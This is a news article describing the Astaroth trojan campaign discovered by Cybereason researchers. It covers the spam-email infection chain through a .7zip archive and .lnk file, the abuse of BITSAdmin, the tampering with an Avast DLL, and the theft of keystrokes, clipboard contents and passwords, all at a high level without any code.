A trojan disguised as an image can infect PCs and avoid being recognized by antivirus. Here’s how Astaroth works
In these days, a new hacker campaign with the Astaroth trojan , already known to security experts because it has infected thousands of computers around the world in the last three months of 2018, is underway in Brazil and Europe . infection starts from a false image, spread by email.
The new strain of the trojan was discovered by Cybereason researchers and also uses BITSAdmin , an official utility of Microsoft Windows designed to facilitate the operations of downloading or uploading, but used by the trojan to download malicious code. This variant of Astaroth is distributed through spam email campaigns and the infection begins with the opening by the user of an archive in .7zip format attached to the email or inserted in a link or, in fact, in a Gif or Jpg image. The malicious archive contains a .lnk file that starts the actual infection. Subsequently, the malware connects to a server and begins to steal information on the infected computer. Then use BITSAdmin to fetch other images and files from another server.
Immune to antiviruses
The very dangerous thing about Astaroth, and the novelty compared to previous infections based on this trojan, is its ability to modify, injecting a malicious code, a .dll file used by the Avast antivirus. Through this file, after having infected it, the trojan manages to steal other information about the machine it is running on and to download other code. Moreover, it also manages to hide itself in case of an antivirus scan carried out with Avast.
What Astaroth does
The Cybereason research team has discovered that once the trojan has successfully infiltrated, it records user keystrokes, intercepts their calls to the operating system and continually gathers all the information saved to the clipboard . With these methods, it collects significant amounts of personal information, including those on the user’s bank accounts. And if the infected PC is connected to a LAN, Astaroth can also collect the network access passwords of all the other computers connected to the same LAN, the email account passwords, the Messenger account data, the password Internet Explorer.
Astaroth first appeared online in 2017, and then infected thousands of PCs, especially in South America. He had several evolutions before arriving at the current one. An earlier version, for example, was hidden in fake Amazon emails containing confirmations of orders never made by the user. But if the user clicked on the links contained in the email the infection started.